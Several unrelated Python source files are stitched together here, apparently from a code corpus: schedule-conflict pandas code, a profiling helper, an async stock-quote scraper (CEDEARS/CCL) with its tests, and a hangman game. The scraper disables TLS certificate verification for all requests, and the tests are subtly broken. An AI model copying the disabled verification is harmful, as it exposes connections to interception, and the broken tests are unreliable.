df = df.sort_values(['shift_start_date', 'shift_end_date'])
conflict_df = pandas.DataFrame()
unique_ids = list(df['provider_primary_key'].dropna().unique())
for c, emp_id in enumerate(unique_ids):
if (c % 13 == 12 or c == len(unique_ids) - 1) and info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%')
elif info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%', end=', ')
emp_sched = df.loc[df['provider_primary_key'] == emp_id]
for i, row in emp_sched.iterrows():
for j, row2 in emp_sched.iterrows():
if j <= i:
continue
elif row2['shift_start_date'] > row['shift_end_date']:
break
if ((row['shift_start_date'] < row2['shift_end_date']) and (
row['shift_end_date'] > row2['shift_start_date'])):
row['conflict_shift_start_date'], row['conflict_shift_end_date'] = row2['shift_start_date'], \
row2['shift_end_date']
row['conflict_index'] = j
conflict_df = conflict_df.append(
row[['conflict_index', 'provider_primary_key', 'shift_start_date',
'shift_end_date', 'conflict_shift_start_date',
'conflict_shift_end_date']])
if not conflict_df.empty:
conflict_df['conflict_index'] = conflict_df['conflict_index'].astype(int)
return conflict_df
def get_schedule_duplicates(self, info=False):
"""
Gets DataFrame of all duplicate entries in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all duplicate entries
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
if not 'provider_primary_key' in df.columns:
raise exceptions.APICallError('get_schedule_conflicts, and get_schedule_duplicates '
'rely on use of provider_primary_key=True.')
dupe_df = pandas.DataFrame()
unique_ids = list(df['provider_primary_key'].dropna().unique())
for c, emp_id in enumerate(unique_ids):
if (c % 13 == 12 or c == len(unique_ids) - 1) and info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%')
elif info:
print(f'{(c+1)/len(unique_ids)*100:>5.2f}%', end=', ')
emp_sched = df.loc[df['provider_primary_key'] == emp_id]
for i, row in emp_sched.iterrows():
for j, row2 in emp_sched.iterrows():
if j <= i:
continue
elif row2['shift_start_date'] > row['shift_end_date']:
break
if ((row['shift_start_date'] == row2['shift_start_date']) and (
row['shift_end_date'] == row2['shift_end_date'])):
row['dupe_shift_start_date'], row['dupe_shift_end_date'] = row2['shift_start_date'], row2[
'shift_end_date']
row['dupe_index'] = j
dupe_df = dupe_df.append(
row[['dupe_index', 'provider_primary_key', 'shift_start_date', 'shift_end_date',
'dupe_shift_start_date', 'dupe_shift_end_date']])
if not dupe_df.empty:
dupe_df['dupe_index'] = dupe_df['dupe_index'].astype(int)
return dupe_df
def generate_duplicates_report(self, dupes):
dupes = dupes.reset_index()
# dupes_left will have originals, dupes_right will have duplicates of originals
if not 'index' in dupes.columns or not 'dupe_index' in dupes.columns:
return pandas.DataFrame()
dupes_left = self.saved_schedule.loc[dupes['index']].reset_index()
dupes_right = self.saved_schedule.loc[dupes['dupe_index']].reset_index()
        # we append and sort on the two indices, the final result has alternating rows of originals and duplicates
dupes_append = dupes_left.append(dupes_right).reset_index().sort_values(['level_0', 'index'])
dupes_append = dupes_append.set_index(['level_0'])
return dupes_append
def generate_conflicts_report(self, conflicts):
conflicts = conflicts.reset_index()
conflicts_left = self.saved_schedule.loc[conflicts['index']].reset_index()
if not 'index' in conflicts.columns or not 'conflict_index' in conflicts.columns:
return pandas.DataFrame()
conflicts_right = self.saved_schedule.loc[conflicts['conflict_index']].reset_index()
conflicts_append = conflicts_left.append(conflicts_right).reset_index().sort_values(['level_0', 'index'])
conflicts_append = conflicts_append.set_index(['level_0'])
return conflicts_append
def remove_schedule_open(self):
"""
Removes all entries from schedule which are just open shifts (providername == 'open') in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
open_df = self.get_schedule_open().reset_index()
if open_df.empty:
print('No open shifts to remove.')
return
rows_to_remove = open_df.shape[0]
temp_df = self.saved_schedule.drop(open_df['index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} open shifts.')
def remove_schedule_empties(self):
"""
Removes all entries from schedule which were not worked (reportedminutes == 0) in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
empty_df = self.get_schedule_empties().reset_index()
if empty_df.empty:
print('No empties to remove.')
return
rows_to_remove = empty_df.shape[0]
temp_df = self.saved_schedule.drop(empty_df['index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} empties.')
def remove_schedule_duplicates(self):
"""
Removes all duplicate entries in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
dupe_df = self.get_schedule_duplicates()
# report must be generated before the duplicates are removed
duplicates_report = self.generate_duplicates_report(dupe_df)
if dupe_df.empty:
print('No duplicates to remove.')
return
rows_to_remove = dupe_df.shape[0]
temp_df = self.saved_schedule.drop(dupe_df['dupe_index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} duplicates.')
def remove_schedule_conflicts(self):
"""
Removes all conflicting entries in the saved_schedule
:return:
"""
initial_length = self.saved_schedule.shape[0]
conflict_df = self.get_schedule_conflicts()
        # report must be generated before the conflicts are removed
        conflicts_report = self.generate_conflicts_report(conflict_df)
        if conflict_df.empty:
            print('No conflicts to remove.')
return
rows_to_remove = 2 * conflict_df.shape[0]
temp_df = self.saved_schedule.drop(conflict_df['conflict_index'])
temp_df = temp_df.drop(conflict_df.reset_index()['index'])
if temp_df.shape[0] == initial_length - rows_to_remove:
self.saved_schedule = temp_df
else:
raise exceptions.APIError(
'An unexpected number of entries were removed; this indicates an issue with the saved schedule.')
print(f'Removed {rows_to_remove} conflicts.')
class ProviderReport(ProviderConnection):
def __init__(self, file, *args, **kwargs):
        if isinstance(file, pandas.DataFrame):
self.df = file.copy()
elif file.upper().endswith('.CSV'):
self.df = pandas.read_csv(file)
else:
self.df = pandas.read_excel(file)
super(ProviderReport, self).__init__(*args, **kwargs)
def add_to_report(self, *args, key_column="provider_id"):
"""
Adds the specified provider information to an excel or csv report according to NPI (emp_id)
:param args: (list) of provider fields to be retrieved from tangier and added to the report
:param key_column: (str) indicates the header name of the column that contains npis or emp_ids on the report
:return: None
"""
clean_ids = lambda x: int(float(x)) if not re.findall('[a-zA-Z]', f'{x}') else 0
self.df[key_column] = self.df[key_column].apply(clean_ids)
self.df[key_column] = self.df[key_column].astype(str)
provider_ids = list(self.df[key_column].unique())
info_list = self.provider_info_values_list(provider_ids=provider_ids)
get_if_in_keys = lambda x, key: x[key] if key in x.keys() else ''
columns_to_add = {arg: f'provider_{arg}' for arg in args}
for column in columns_to_add.values():
self.df[column] = ''
original_index_name = self.df.index.name
self.df = self.df.reset_index()
for index, row in self.df.iterrows():
provider_info = [*filter(lambda x: x.get("emp_id") == row[key_column], info_list)]
if provider_info:
for dict_key, df_column in columns_to_add.items():
self.df.loc[index, f'{df_column}'] = get_if_in_keys(provider_info[0], dict_key)
columns = list(self.df.columns.values)
reordered_columns = [key_column, *columns_to_add.values()]
for col in reordered_columns:
columns.remove(col)
reordered_columns.extend(columns)
self.df = self.df[[*reordered_columns]]
self.df = self.df.set_index("index" if not original_index_name else original_index_name)
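# Hypothetical usage sketch (file name and requested fields are illustrative):
# report = ProviderReport('roster.csv')
# report.add_to_report('first_name', 'last_name', key_column='provider_id')
# report.df  # now carries provider_first_name / provider_last_name columns up front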
class ScheduleWithData:
def __init__(self, schedule_connection, provider_connection, location_connection):
        try:
            import pandas
        except ImportError:
            raise ImportError(f'{type(self).__name__} requires pandas to be importable in your environment.')
if not isinstance(schedule_connection, ScheduleConnection):
raise exceptions.APIError('schedule_connection argument (arg[0]) must be a ScheduleConnection instance.')
if not isinstance(provider_connection, ProviderConnection):
raise exceptions.APIError('provider_connection argument (arg[1]) must be a ProviderConnection instance.')
if not isinstance(location_connection, LocationConnection):
            raise exceptions.APIError('location_connection argument (arg[2]) must be a LocationConnection instance.')
self.sconn = schedule_connection
self.pconn = provider_connection
self.lconn = location_connection
def _get_provider_info(self):
self.providers = pandas.DataFrame(self.pconn.provider_info_values_list(all_providers=True,
use_primary_keys=True)).fillna('')
def _get_location_info(self):
self.locations = pandas.DataFrame(self.lconn.location_info_values_list(site_ids='ALL_SITE_IDS')).fillna('')
def save_schedule_from_range(self, start_date, end_date):
self._get_provider_info()
self._get_location_info()
self.sconn.save_schedule_from_range(start_date, end_date,
site_ids=list(self.locations['site_id'].unique()),
include_provider_primary_key='true')
self.saved_schedule = self.sconn.saved_schedule
self.temp_locations = self.locations.drop(columns=['@action', 'is_scheduled']) \
.rename(columns={'name': 'site_name', 'short_name': 'site_short_name'})
self.temp_providers = self.providers.drop(
columns=['@action', 'processed', 'comment', 'street', 'city', 'state', 'zip'])
with_sites = self.saved_schedule.merge(self.temp_locations, how='left', left_on=['siteid'],
right_on=['site_id']).drop(columns=['location'])
with_all = with_sites.merge(self.temp_providers, how='left', left_on=['providerprimarykey'],
right_on=['provider_primary_key'])
with_all = with_all.drop(columns=['empid', 'siteid', 'providerprimarykey'])
self.saved_schedule = with_all.fillna('')
self.sconn.saved_schedule = self.saved_schedule
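# Hypothetical usage sketch (the three connection objects are assumed configured):
# swd = ScheduleWithData(sconn, pconn, lconn)
# swd.save_schedule_from_range('2020-01-01', '2020-01-31')
# swd.saved_schedule  # schedule rows joined with site and provider details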
class ProviderLocations:
def __init__(self, pconn, lconn):
self.pconn = pconn
self.lconn = lconn
self.all_locations = lconn.location_info_values_list()
self.all_providers = pconn.provider_info_values_list(all_providers=True)
self.all_location_provider_values = []
@property
def all_location_provider_values(self):
"""
        Fetched lazily: retrieve the values on first access and cache them.
"""
if not self.__all_location_provider_values:
self.all_location_provider_values = self._get_all_location_provider_values()
return self.__all_location_provider_values
@all_location_provider_values.setter
def all_location_provider_values(self, val):
self.__all_location_provider_values = [*val]
def _get_all_location_provider_values(self):
values_list, current_line = [], ''
for location in self.all_locations:
values_list.extend(self.location_provider_values(location['site_id']))
current_line = self._print_stream(location['site_id'], current_line)
self.all_location_provider_values = [*values_list]
return values_list
def _print_stream(self, current_item, current_line):
new_line = f'{current_line + " " if current_line else ""}{current_item}'
if len(new_line) > 79:
new_line = f'{current_item} '
sys.stdout.write('\n')
sys.stdout.write(new_line)
else:
sys.stdout.write(f'{current_item} ')
sys.stdout.flush()
return new_line
def location_provider_info(self, site_id):
"""
        Sends a provider info request for all provider_ids at one site_id
        :param site_id: (str) site_id to get provider info for
:return: xml with a provider info response
"""
xml_string = self.pconn.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, providers="")
provider_dict = {
'provider': {
"action": "info", "__inner_tag": {
"site_id": site_id,
"provider_primary_key": "ALL",
}
}
}
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="providers", **provider_dict)
return self.pconn.MaintainProviders(xml_string).encode('utf-8')
def location_provider_values(self, site_id):
location_provider_info_response = self.location_provider_info(site_id)
location_provider_info_schema = xmlmanip.XMLSchema(location_provider_info_response)
location_provider_values = location_provider_info_schema.search(site_id__ne='')
return location_provider_values
def join_all_locations_with_all_providers(self):
normalized_provider_location_values = self.all_location_provider_values
normalized_provider_location_values_df = pandas.DataFrame(normalized_provider_location_values)
provider_info_df = pandas.DataFrame(self.all_providers)
joined_df = normalized_provider_location_values_df.merge(provider_info_df, how='inner',
left_on=['provider_primary_key', 'emp_id'],
right_on=['provider_primary_key', 'emp_id'])
return joined_df
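# Hypothetical usage sketch (pconn/lconn are assumed live connections):
# pl = ProviderLocations(pconn, lconn)
# joined = pl.join_all_locations_with_all_providers()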
``` |
{
"source": "jJoshi1812/2LayerPerceptronFromScratch",
"score": 3
} |
#### File: src/2LP/ProfileFile.py
```python
import cProfile
import CodeFile
import Loading_Data
import numpy as np
from sklearn import model_selection
import pandas as pd
import pstats
from functools import wraps
# boilerplate for profiling
def profile(output_file=None, sort_by='cumulative', lines_to_print=None, strip_dirs=False):
def inner(func):
@wraps(func)
def wrapper(*args, **kwargs):
_output_file = output_file or func.__name__ + '.prof'
pr = cProfile.Profile()
pr.enable()
retval = func(*args, **kwargs)
pr.disable()
pr.dump_stats(_output_file)
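            # NOTE: the pstats block below reopens _output_file in 'w' mode, so the
            # binary dump written here is replaced by the human-readable report.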
with open(_output_file, 'w') as f:
ps = pstats.Stats(pr, stream=f)
if strip_dirs:
ps.strip_dirs()
if isinstance(sort_by, (tuple, list)):
ps.sort_stats(*sort_by)
else:
ps.sort_stats(sort_by)
ps.print_stats(lines_to_print)
return retval
return wrapper
return inner
@profile(output_file='Profiling_Info.txt', sort_by='cumulative', strip_dirs=True)
def profiling_info(X, y):
model = CodeFile.TLP(0.001)
model = model
model.add(CodeFile.LayerRelu(5))
model.add(CodeFile.LayerSigmoid(10))
model.fit(X, y)
model.compile(epochs=1)
if __name__=="__main__":
data=Loading_Data.DataFrameLoader()
dataset_x_tr, dataset_x_ts,dataset_y_tr, dataset_y_ts=data.load_dataframes()
dataset_y_tr.drop(['index'],inplace=True,axis=1)
dataset_x_tr.drop(['index'],inplace=True,axis=1)
dataset_y_ts.drop(['index'],inplace=True,axis=1)
dataset_x_ts.drop(['index'],inplace=True,axis=1)
y=pd.get_dummies(dataset_y_tr.squeeze())
y=y.values.T
X=dataset_x_tr.values.reshape(60000,784).T
# Features
print('DataSet has been split into train and Validation set! 10% of data will be used as Validation Set')
profiling_info(X, y)
``` |
{
"source": "jjo/stocks",
"score": 2
} |
#### File: stocks/cedears/cedears.py
```python
import argparse
import sys
import re
import os
import asyncio
import logging
import json
import jsonpath_rw as jp
import urllib3
import pandas as pd
import httpx
import httpcore
from aiocache import cached, Cache
from aiocache.serializers import PickleSerializer
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
LOGGER = logging.getLogger()
CONCURRENCY = 20
CEDEARS_RATIOS_URL = r'https://www.comafi.com.ar/2254-CEADEAR-SHARES.note.aspx'
CEDEARS_LIVE_URL = r'https://www.byma.com.ar/wp-admin/admin-ajax.php'
CEDEARS_LIVE_PARAMS = {'action': 'get_panel', 'panel_id': '5'}
USER_AGENT = (
'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) '
'AppleWebKit/533.17.9 (KHTML, like Gecko)'
'Version/5.0.2 Mobile/8J2 Safari/6533.18.5')
ZACKS_URL = r'https://www.zacks.com/stock/quote/{}'
YAHOOFIN_URL = r'https://query1.finance.yahoo.com/v10/finance/quoteSummary/{}'
YAHOOFIN_PARAMS = {'modules': 'financialData'}
SEM = asyncio.Semaphore(CONCURRENCY)
VOLUME_QUANTILE = 0.75
ARGS = None
CACHE = {"cache": Cache.MEMORY}
def parseargs():
'std parseargs'
parser = argparse.ArgumentParser(description="CEDEARS CCL tool by jjo")
parser.add_argument('--vol-q',
type=float,
default=VOLUME_QUANTILE,
help="min vol quantile, default: %s" % VOLUME_QUANTILE)
parser.add_argument('--no-filter',
action="store_true",
help="Get them all(!)")
parser.add_argument('--tickers',
default="",
help="comma delimited list of stocks to include")
parser.add_argument('--cache',
default="memory",
help="cache to use, eg --cache=memcache")
return parser.parse_args()
ARGS = parseargs()
if ARGS.cache == "memcache":
LOGGER.info("Using cache=%s", ARGS.cache)
MC_ENDPOINT = os.getenv('MEMCACHE_ENDPOINT', '127.0.0.1:11211')
MC_HOST, MC_PORT = tuple(MC_ENDPOINT.split(':'))
MC_PORT = int(MC_PORT)
CACHE = {
"cache": Cache.MEMCACHED,
"endpoint": MC_HOST,
"port": MC_PORT,
"pool_size": 10,
}
@cached(ttl=60, **CACHE, serializer=PickleSerializer(), namespace="url")
async def url_get(url, **kwargs):
'client.get wrapper with force USER_AGENT'
async with SEM:
async with httpx.AsyncClient(verify=False) as client:
reply = await client.get(url,
headers={'User-Agent': USER_AGENT},
**kwargs)
LOGGER.info("url=%s", reply.url)
return reply.text
@cached(ttl=3600, **CACHE, serializer=PickleSerializer(), namespace="ratios")
async def get_ratios():
'get CEDEARS ratios'
def _ratio(colon_sep):
ratio_args = colon_sep.split(':')
return float(ratio_args[0]) / float(ratio_args[1])
LOGGER.info("CEDEARS ratios: fetching from %s", CEDEARS_RATIOS_URL)
# Returns list of all tables on page
resp = await url_get(CEDEARS_RATIOS_URL, timeout=60)
tables = pd.read_html(resp)
# Single table in page
table = tables[0]
# Translate field names ES -> EN
table.columns = [col.split(" ")[0] for col in table.columns]
LOGGER.info("columns=%s", table.columns)
table.rename(columns={
'Ticker': 'US_Ticker',
'Símbolo': 'Ticker',
},
inplace=True)
# Transform X:Y string ratio to X/Y float
table['Ratio'] = table['Ratio'].apply(_ratio)
table = table.set_index('Ticker', drop=False)
LOGGER.info("CEDEARS ratios: got %s entries", len(table))
return table
@cached(ttl=60,
**CACHE,
serializer=PickleSerializer(),
key="byma",
namespace="byma")
async def get_byma(ratios):
'Get BYMA live quotes'
LOGGER.info("CEDEARS quotes: fetching from %s", CEDEARS_LIVE_URL)
    # NOTE: CEDEARS_LIVE_URL does not serve a proper TLS cert, hence verify=False in url_get
resp = await url_get(CEDEARS_LIVE_URL,
timeout=30,
params=CEDEARS_LIVE_PARAMS)
# Parse JSON into DF
dframe = pd.DataFrame(columns=[
'Ticker', 'AR_val', 'Ratio', 'AR_Vol', 'AR_Buy', 'AR_Sel', 'AR_chg',
'US_Ticker'
])
for quote in json.loads(resp)["Cotizaciones"]:
# - only ARS tickers
if quote['Tipo_Liquidacion'] != "Pesos":
continue
# - if market is not yet open (between 10:00am - 11:30am), grab value
# from latest (Compra+Venta)/2
# - XXX: not meaningful, need to really wait for market open
#if quote['Ultimo'] != 0:
# ars_value = quote['Ultimo']
#elif (quote['Precio_Compra'] != 0 and quote['Precio_Venta'] != 0):
# ars_value = (quote['Precio_Compra'] + quote['Precio_Venta'])/2
#else:
# continue
ars_value = quote['Ultimo']
ticker = quote['Simbolo']
period = quote['Vencimiento']
volume = quote['Volumen_Nominal']
ars_buy = quote['Cantidad_Nominal_Compra']
ars_sell = quote['Cantidad_Nominal_Venta']
ars_delta = quote['Variacion']
#LOGGER.info('ticker={} ars_value={}'.format(ticker, ars_value))
try:
ratio = ratios.loc[ticker, 'Ratio']
except KeyError:
continue
us_ticker = ratios.loc[ticker, 'US_Ticker']
dframe = dframe.append(
{
'Ticker': ticker,
'US_Ticker': us_ticker,
'AR_val': ars_value,
'Ratio': round(ratio, 2),
'AR_Vol': volume,
'AR_Buy': ars_buy,
'AR_Sel': ars_sell,
'AR_hrs': period,
'AR_chg': ars_delta,
},
ignore_index=True)
# Index the DF by ticker
dframe = dframe.set_index("Ticker")
LOGGER.info("CEDEARS quotes: got %d entries", len(dframe))
if len(dframe) == 0:
LOGGER.warning("CEDEARS quotes: ZERO -- Market not yet open ?")
return dframe
@cached(ttl=1800, **CACHE, serializer=PickleSerializer(), namespace="zrank")
async def get_zacks_rank(stock):
'get Zacks rank from ZACKS_URL and parse dirty HTML'
url = ZACKS_URL.format(stock)
rank = "N/A"
try:
resp = await url_get(url, timeout=30)
rank_match = re.search(
r'\n\s*([^<]+).+rank_chip.rankrect_1.*rank_chip.rankrect_2', resp)
except (httpcore._exceptions.ProtocolError,
httpcore._exceptions.ReadTimeout, asyncio.exceptions.TimeoutError):
return rank
try:
rank = rank_match.groups(1)[0]
except AttributeError:
return rank
# Save found rank into cache
rank = "{:8}".format(rank.replace("Strong ", "S"))
LOGGER.debug("stock={:8} rank={:8}".format(stock, rank))
return rank
@cached(ttl=60, **CACHE, serializer=PickleSerializer(), namespace="usd_value")
async def get_usd_value(stock):
'Get live quote from YAHOO'
url = YAHOOFIN_URL.format(stock)
resp = await url_get(url, timeout=30, params=YAHOOFIN_PARAMS)
# Use jsonpath to traverse it down to the data we want
jp_exp = jp.parse('$.quoteSummary.result..financialData.currentPrice.raw')
    if resp == "":
        return
    try:
        price = jp_exp.find(json.loads(resp))[0].value
    except (IndexError, json.decoder.JSONDecodeError):
        return
# Save found price into cache
LOGGER.debug("stock={:8} price={:0.2f}".format(stock, price))
return price
# Just a convenience function that's called a couple of times below
def ccl_val(price_ars, price, ratio):
'just a math wrapper for the CCL calculation'
return price_ars / price * ratio
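# Worked example (illustrative numbers): price_ars=1500, price=100, ratio=10
# gives ccl_val = 1500 / 100 * 10 = 150 ARS per USD.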
def df_loc1(dframe, index, col):
    'pandas .loc returns a scalar or a Series depending on index uniqueness; always take a single value'
return dframe.loc[dframe.index == index, col].head(1).iloc[0]
async def warmcache(dframe):
'Pre-warm cache'
# Stocks list is DF index
stocks = set(dframe.index.values.tolist())
# Async stanza, to concurrently fetch stocks' price and zacks rank
futures = []
# Warm caches
for stock in stocks:
# We may have several entries for (AR)stock, just choose one:
us_stock = df_loc1(dframe, stock, 'US_Ticker')
assert isinstance(us_stock,
str), ("stock={} returned type(us_stock)={}".format(
stock, type(us_stock)))
futures.append(get_usd_value(us_stock))
futures.append(get_zacks_rank(us_stock))
# Called functions will be cached, discard values
for _ in await asyncio.gather(*futures):
pass
return
async def fetch(dframe):
'Stocks list is DF index'
stocks = set(dframe.index.values.tolist())
await warmcache(dframe)
# Add new columns to dataframe with obtained CCL value (ARS/USD ratio
# for the ticker), and Zacks rank
for stock in stocks:
us_stock = df_loc1(dframe, stock, 'US_Ticker')
price = await get_usd_value(us_stock)
rank = await get_zacks_rank(us_stock)
if (price is None or price == 0.0 or rank is None):
dframe.drop(stock, inplace=True)
continue
# Add (column and) cell with computed values
dframe.loc[stock, 'ZRank'] = rank
dframe.loc[stock, 'USD_val'] = price
dframe['AR_tot'] = dframe.apply(lambda row: row.AR_val * row.Ratio, axis=1)
dframe['CCL_val'] = dframe.apply(
lambda row: round(ccl_val(row.AR_val, row.USD_val, row.Ratio), 2),
axis=1)
# Use quantile 0.5 as reference value
ccl_ref = dframe.loc[:, 'CCL_val'].quantile(0.5, interpolation='nearest')
dframe = dframe.assign(
CCL_pct=lambda x: round((x['CCL_val'] / ccl_ref - 1) * 100, 2))
# Sort DF by CCL_pct
dframe.sort_values(by=['CCL_pct'], inplace=True)
return dframe
async def get_main_df(args):
'''
Main function: pre-filter some stocks (quantile) and call fetch to actually
get them
'''
urllib3.disable_warnings()
# This 1st part is synchronous, as it's required to build the final dataframe
ratios = await get_ratios()
byma_all = await get_byma(ratios)
tickers_to_include = args.tickers.split(',')
# Choose only stocks with AR_val > 0 and volume over vol_q
if args.no_filter:
dframe = byma_all
else:
dframe = byma_all[(byma_all.AR_val > 0) & (
(byma_all.AR_Vol >= byma_all.AR_Vol.quantile(args.vol_q))
| (byma_all.AR_Buy >= byma_all.AR_Buy.quantile(args.vol_q))
| (byma_all.AR_Sel >= byma_all.AR_Sel.quantile(args.vol_q))
| (byma_all.index.isin(tickers_to_include)))]
if len(dframe) == 0:
#LOGGER.fatal("NO stocks grabbed")
#sys.exit(1)
dframe = byma_all[(
(byma_all.AR_Vol >= byma_all.AR_Vol.quantile(args.vol_q))
| (byma_all.AR_Buy >= byma_all.AR_Buy.quantile(args.vol_q))
| (byma_all.AR_Sel >= byma_all.AR_Sel.quantile(args.vol_q))
| (byma_all.index.isin(tickers_to_include)))]
dframe.sort_index(inplace=True)
LOGGER.info(
"CEDEARS CCLs: filtered {} tickers for q >= {:.2f}, incl={}".format(
len(dframe), args.vol_q, str(tickers_to_include)))
dframe = await (fetch(dframe))
# Sort DF columns
dframe.round({'CCL_pct': 2})
dframe = dframe.reindex(sorted(dframe.columns), axis=1)
return dframe
def main():
'The main()'
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
args = parseargs()
LOGGER.info("Choosing CEDEARS with volume >= {:0.2f} quantile".format(
args.vol_q))
# Invoke "main" function (which does async url fetching)
loop = asyncio.get_event_loop()
#dframe = loop.run_until_complete(fetch(dframe))
# return get_main_df(args)
return loop.run_until_complete(get_main_df(args))
if __name__ == '__main__':
DFRAME = main()
print(DFRAME)
```
#### File: stocks/cedears/test_cedears.py
```python
'tests'
import argparse
import os
import unittest
import urllib
import json
import sys
import re
import mock
import cedears
CEDEARS_RATIOS_FILE = "CEDEARS-SHARES.html"
CEDEARS_LIVE_FILE = "CEDEARS-quotes.json"
URL_FILE_RE = {
b'https://www.zacks.com/stock/quote/(.+)': r"zacks-{}.html",
b'https://query1.finance.yahoo.com/v10/finance/quoteSummary/(.*)': r"yfin-{}.json"
}
def local_url_to_file(url):
'...'
url_to_file = {
cedears.CEDEARS_RATIOS_URL: CEDEARS_RATIOS_FILE,
cedears.CEDEARS_LIVE_URL: CEDEARS_LIVE_FILE,
}
file_url = url_to_file.get(url)
if file_url is None:
for (k, value) in URL_FILE_RE.items():
match = re.match(k, bytes(url, encoding="utf-8"))
if match:
stock = match.groups(1)[0].decode("utf-8")
file_url = value.format(stock)
return 'file://{}/testdata/{}'.format(
os.getcwd(), file_url
)
def local_get(url, **kwargs):
"Fetch a stream from local files."
p_url = local_url_to_file(url)
p_url = urllib.parse.urlparse(p_url)
if p_url.scheme != 'file':
raise ValueError("Expected file scheme")
filename = urllib.request.url2pathname(p_url.path)
text = open(filename, 'rb').read().decode("utf-8")
json_ret = {}
try:
json_ret = json.loads(text)
except json.decoder.JSONDecodeError:
pass
return type('testreq', (object,),
{
"text": text,
"url": url,
"json": lambda x: json_ret,
"status_code": 200,
})()
@mock.patch('cedears.url_get', local_get)
class TestCedears(unittest.TestCase):
def test_get_ratios(self):
df = cedears.get_ratios()
self.assertEqual(len(df), 237)
self.assertEqual(df.loc['AAPL', 'Ratio'], 10.0)
self.assertEqual(df.loc['XOM', 'Ratio'], 5.0)
self.assertEqual(df.loc['DISN', 'US_Ticker'], 'DIS')
return df
def test_get_byma(self):
ratios = self.test_get_ratios()
df = cedears.get_byma(ratios)
self.assertEqual(df.loc['AAPL', 'Ratio'], 10.0)
self.assertEqual(cedears.df_loc1(df, 'DISN', 'US_Ticker'), 'DIS')
@mock.patch('cedears.argparse.ArgumentParser.parse_args',
                return_value=argparse.Namespace(vol_q=0.98, no_filter=False, tickers='', cache='memory'))
def test_get_main_df(self, mock_args):
df = cedears.main()
self.assertEqual(df.loc['XOM', 'CCL_ratio'], -0.7198023972132983)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "J-Josu/Computer-Science",
"score": 2
} |
#### File: Python/Programas/El_Ahorcado.py
```python
import os
import random
'''
┌╔────────┐
│║ Ô
│║ └┼┘
│║ │
│║ ┌┴┐
│║ ┌─────────┐
│║ │ │
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
'''
FRAMES = {
'base' : (
' ┌╔─────────┐',
' │║',
' │║',
' │║',
' │║',
' │║ ┌─────────┐',
' │║ │ │',
'▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀'
),
'levels' : (
{ 1 : ' │║ Ô ' },
{ 2 : ' │║ └┼ ' },
{ 2 : ' │║ └┼┘' },
{ 3 : ' │║ ┌┴ ' },
{ 3 : ' │║ ┌┴┐' }
),
    'lose' : '''
┌╔─────────┐
│║ │
│║ │
│║ Ø YOU
│║ ┌┼┐ ║ ╔╗ ╔═ ╔═
│║ ┌─┐ ┌┴┐ ┌─┐ ║ ║║ ╚╗ ╠═
│║ │ │ ╚═ ╚╝ ═╝ ╚═
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
''',
'win' : '''
┌╔─────────
│║
│║ O
│║ ┌┼┐ YOU
│║ ┌┴┐ ║ ║ ¤ ╔═╗
│║ ┌───┴─┴───┐ ║ ║ ║ ║ ║ ║
│║ │ │ ╚═╩═╝ ╚ ╚ ╚
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
'''
}
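# Each tuple entry in FRAMES['levels'] above maps a frame line index to the art
# drawn for that miss count: head, one arm, both arms, one leg, both legs.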
WORDS_DICT = {
    'Colores' :'rojo naranja amarillo verde azul celeste violeta blanco negro marron esmeralda cafe gris rosa bordo beille'.split(),
'Figuras' :'cuadrado triangulo rectangulo circulo elipse rombo trapezoide pentagono hexagono octagono '.split(),
'Comida' :'manzana naranja limon lima pera sandia cereza banana mango frutilla tomate '\
'berenjena cebolla repollo calabaza zuchini papa acelga espinaca lechuga apio batata '\
'asado milanesa choripan'.split(),
'Animales':'murcielago oso gato cangrejo perro mono pato aguila pescado rana cabra leon raton panda piton tiburon oveja pulpo tigre tortuga ballena lobo zebra camello elefante'.split(),
    'Programacion': 'agda algol assembly '\
'basic '\
                    'csharp clojure coffeescript crystal '\
'dart delphi '\
'fortran '\
'go '\
'haskell '\
'java javascript '\
                    'python typescript robotscript rinfo rust'.split()
}
def clear_console():
os.system('cls')
def getRandomWord():
# First, randomly select a key from the dictionary:
key = random.choice(list(WORDS_DICT.keys()))
# Second, randomly select a word from the key's list in the dictionary:
wordIndex = random.randint(0, len(WORDS_DICT[key]) - 1)
return [key, WORDS_DICT[key][wordIndex]]
def displayBoard(missed_letters, correct_letters, secret_word, frame):
level = len(missed_letters)
if level > 0:
update = FRAMES['levels'][level-1]
for key in update.keys():
frame[key] = update[key]
for line in frame:
print(line)
print('Letras erroneas:', end=' ')
for letter in missed_letters:
print(letter, end=' ')
print()
blanks = '_' * len(secret_word)
for i in range(len(secret_word)): # replace blanks with correctly guessed letters
if secret_word[i] in correct_letters:
blanks = blanks[:i] + secret_word[i] + blanks[i+1:]
for letter in blanks: # show the secret word with spaces in between each letter
print(letter, end=' ')
print()
def getGuess(already_guessed):
while True:
guess = input('Letra: ').lower()
if len(guess) != 1:
print('Se pidio una letra, intenta nuevamente')
